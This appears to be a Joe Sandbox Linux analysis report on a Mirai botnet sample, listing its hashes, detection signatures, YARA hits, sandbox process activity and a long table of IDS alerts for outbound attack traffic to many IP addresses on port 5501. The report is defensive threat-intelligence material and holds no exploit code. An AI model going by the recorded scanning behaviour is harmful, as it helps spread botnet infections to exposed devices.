Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
b3astmode.sh4.elf

Overview

General Information

Sample name:b3astmode.sh4.elf
Analysis ID:1574165
MD5:01a9ed49c3a4c3624baea4b58ea3a4b0
SHA1:4cff2a0dee389eef0b1fd61478a9235f89627e0c
SHA256:209f874b49d9c268531991859b9c996264c992d2ddcb77c67e84698a0eb410a0
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:88
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Detected Mirai
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes the "rm" command used to delete files or directories
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1574165
Start date and time:2024-12-13 01:12:58 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 36s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:b3astmode.sh4.elf
Detection:MAL
Classification:mal88.troj.linELF@0/0@0/0
  • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
  • Report size exceeded maximum capacity and may have missing network information.
Command:/tmp/b3astmode.sh4.elf
PID:6259
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
BEASTMODE-BITCHES@@""""/p
Standard Error:
  • system is lnxubuntu20
  • dash New Fork (PID: 6283, Parent: 4331)
  • rm (PID: 6283, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.bkLjVpPp7h /tmp/tmp.j2MlLX1DRY /tmp/tmp.x6vksjEfdZ
  • dash New Fork (PID: 6284, Parent: 4331)
  • rm (PID: 6284, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.bkLjVpPp7h /tmp/tmp.j2MlLX1DRY /tmp/tmp.x6vksjEfdZ
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
b3astmode.sh4.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
    SourceRuleDescriptionAuthorStrings
    6259.1.00007f09d8400000.00007f09d840b000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
      6264.1.00007f09d8400000.00007f09d840b000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
        6278.1.00007f09d8400000.00007f09d840b000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
          Process Memory Space: b3astmode.sh4.elf PID: 6259JoeSecurity_Mirai_6Yara detected MiraiJoe Security
            Process Memory Space: b3astmode.sh4.elf PID: 6264JoeSecurity_Mirai_6Yara detected MiraiJoe Security
              Click to see the 1 entries
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2350662178.67.183.655501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.235573489.242.201.895501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2333502179.40.155.2445501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2360232181.59.102.1655501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2339336198.57.128.375501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2346594157.236.92.2505501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2333120216.49.130.1125501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2347832102.192.235.2125501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2350914175.179.38.1855501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234329824.55.141.465501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2333978128.241.95.2065501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2343024102.195.193.1855501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2355654203.107.235.1595501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2332810107.135.218.1215501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2354482221.207.6.2245501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2360356145.65.214.875501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.235535236.63.179.1205501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2351306186.115.152.615501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2345296202.8.4.665501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.236094631.199.212.2085501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2337148106.237.241.2265501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2360900154.182.196.935501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.233928287.3.243.745501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.233666293.246.216.2275501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2350394135.12.107.1755501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2351722103.16.191.1335501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2360598153.50.5.1255501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234966864.128.47.1045501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2345138168.177.66.1165501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2359330198.14.67.2155501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.233913032.226.152.1815501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2340490104.129.67.695501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2334804219.54.160.745501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.233455635.205.63.165501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234195419.8.149.775501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2355314178.130.136.185501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.235388037.68.200.265501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.233635685.229.94.2325501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.233708281.196.81.2085501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2344510101.77.7.775501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2334194158.159.195.2285501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234669291.119.82.645501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.233459244.103.96.2005501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2346352207.23.116.95501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234355479.3.10.1535501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.233549048.182.227.1695501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2353288140.171.49.415501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2334932159.93.136.2205501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2338256150.92.194.1085501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2342822110.158.161.1805501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2354572211.29.90.1455501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234442263.206.18.1355501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2346386190.205.73.1705501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.235691874.42.12.2035501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.233316849.8.41.2135501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234234288.236.46.1145501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2345546200.17.222.975501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.235470641.174.83.1415501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.23538101.163.69.2325501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.235262887.217.164.1995501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2344338210.206.50.545501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2334426199.6.78.295501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.23372081.108.173.2475501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2352970216.45.65.85501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2359240197.120.101.2525501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.235606652.228.15.755501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2357506210.197.246.1395501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234991623.129.195.1175501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.23590944.191.192.1145501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2335384110.134.196.1845501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234453896.254.227.1005501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234294678.3.18.1395501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.233419671.237.90.1485501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234181293.217.17.745501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2348332118.197.192.1135501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2346310132.189.214.335501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.23530204.79.100.745501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.235306051.81.236.315501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2353288118.167.133.1075501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2356512212.25.225.2355501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2357426141.118.44.1915501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.235257054.91.150.2365501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.23515928.184.110.1755501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2354640119.92.21.2295501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2342058104.39.26.1545501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.235782436.45.4.365501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2357142170.92.18.1585501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2332986205.41.251.2485501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.233549459.70.118.1375501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2336170183.132.190.745501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234932847.19.57.2155501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2350520168.97.175.145501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.235136277.51.93.2295501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2335466201.174.21.2215501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.233508448.66.156.325501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2353570189.197.210.865501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2357678135.167.202.1695501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2349978207.50.163.485501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.235315299.140.89.255501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234415432.110.89.1355501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2348942171.118.48.2255501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.235505298.16.95.315501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2352188177.111.173.1815501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2343884194.159.255.1005501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2359768164.240.143.475501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2341352156.80.85.825501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2333764198.135.25.345501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.235657448.146.54.2115501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.235762099.20.89.2225501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234179471.147.102.1715501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234294020.65.77.645501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2348896135.187.132.2175501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2358028188.74.203.1585501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2356474153.17.105.475501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234031689.91.166.1075501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.233784636.84.141.2325501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2333492102.199.93.2005501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2334146201.165.11.2005501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2356774180.197.187.95501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2345880132.155.22.265501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.233869236.15.21.945501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2339266222.248.112.1535501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234766247.118.249.595501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.235476474.255.87.635501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.235875086.218.24.385501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234713846.73.253.845501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234504068.229.49.2045501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2344278160.67.4.885501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2335664137.0.176.1225501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2341870209.64.110.1825501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2339036194.223.156.1895501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2337786211.222.211.905501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.235703087.90.163.1655501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2358704112.212.47.1125501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.235986031.82.185.1095501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.235748868.65.161.2035501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234203235.234.140.2325501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.235098417.135.118.355501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2344338185.216.178.375501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234045836.174.203.685501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2341716130.234.141.1565501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2341538110.85.85.2085501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2338754172.110.51.1515501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2335064181.36.111.275501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2336030148.120.5.2325501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234442484.236.143.1955501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.233381232.158.166.1905501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234246891.19.134.1175501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.233920248.136.45.1775501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.235432473.105.84.465501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2356902206.99.180.1545501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2359338184.65.226.2515501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2333040217.22.143.1165501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.235568439.78.82.2295501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.235792691.36.187.355501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.233302873.40.14.1505501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2358982211.168.242.775501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.235947072.39.55.2035501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2355302173.113.131.2375501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2346628206.132.8.435501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2344540108.110.136.2205501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2354576132.88.128.605501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.233799037.168.234.835501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2351820174.145.15.2195501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2339034145.78.220.1145501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2337330111.23.155.685501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234600491.120.18.975501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2335248108.77.51.795501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.233764427.167.173.415501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234215297.121.209.2165501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2360110161.229.184.1055501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.235786499.33.106.1195501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2345270138.176.54.1075501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2360142129.15.250.745501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2345140170.159.26.1915501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.23472849.93.123.745501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234748440.119.121.2065501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.236091025.213.102.215501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234870898.151.179.2015501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2342816107.100.184.15501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.235137224.124.62.555501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2357778206.49.60.1905501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2337992167.142.201.2475501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2337306116.31.247.65501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.235061065.26.16.1635501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.233994236.66.45.735501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.235092681.50.252.2385501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2354702192.180.179.2445501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2356684134.30.7.1625501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234992445.67.168.1755501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234708413.129.11.1265501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2350038113.97.48.1285501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2337666198.36.161.2435501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2355920128.140.242.1645501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2333602128.208.77.35501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2349534196.25.159.535501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.235782859.169.73.1855501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.235773427.248.238.435501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2358708192.230.61.2505501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2333270157.211.71.565501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2338370204.154.195.1915501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.235887249.255.209.235501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.23577749.26.235.1315501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234165643.12.72.225501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234579497.158.104.1655501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2341530217.104.129.1785501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2342300129.59.74.2535501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.233725670.35.208.445501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234492897.112.48.1115501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.235033623.5.19.1165501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2360282148.181.80.355501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234418072.211.227.2045501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234564269.22.221.165501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234955014.51.114.55501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234359867.68.20.2195501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.235971217.192.252.985501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2347556138.152.111.125501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2350582220.16.18.2485501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.233416498.69.174.05501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234585476.63.54.2005501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.23609882.145.172.1365501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.235599283.109.100.1235501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2359472114.180.108.2415501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.233553014.1.5.245501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2356828112.118.245.445501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2339988161.93.231.155501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234065654.152.14.2035501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2334440207.191.248.2385501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.233578673.77.239.1675501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2355272217.37.173.275501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2344390119.58.221.2405501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2353572135.127.152.1255501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2339366183.163.209.1615501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.233591214.247.129.2255501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.233981027.210.15.865501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.233981497.50.190.615501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2351844148.52.67.795501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2345416125.172.238.565501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2356836163.215.128.1365501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2338708130.51.45.95501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2350630100.137.220.1335501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.233648636.238.166.2005501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2339714170.227.36.1545501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234012441.183.83.1585501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.233339279.23.120.95501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2344696155.31.61.335501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234580678.1.178.1905501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2353734110.189.70.235501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.235162845.0.217.2115501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2346694212.239.177.1305501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2358908210.168.28.2275501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2356782104.217.95.35501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2349548188.4.221.1325501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.235925497.38.5.1145501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.233303075.58.36.775501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234251882.76.197.1235501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2344368212.182.219.1575501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2335212208.108.178.955501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234591657.205.108.2235501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234189471.155.44.1855501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2356024117.135.64.1005501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2333060156.189.149.1605501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.2340686197.128.203.1465501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234985832.8.187.125501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.233936824.130.200.425501TCP
              2024-12-13T01:14:16.659855+010020300921Web Application Attack192.168.2.234525017.13.227.1055501TCP
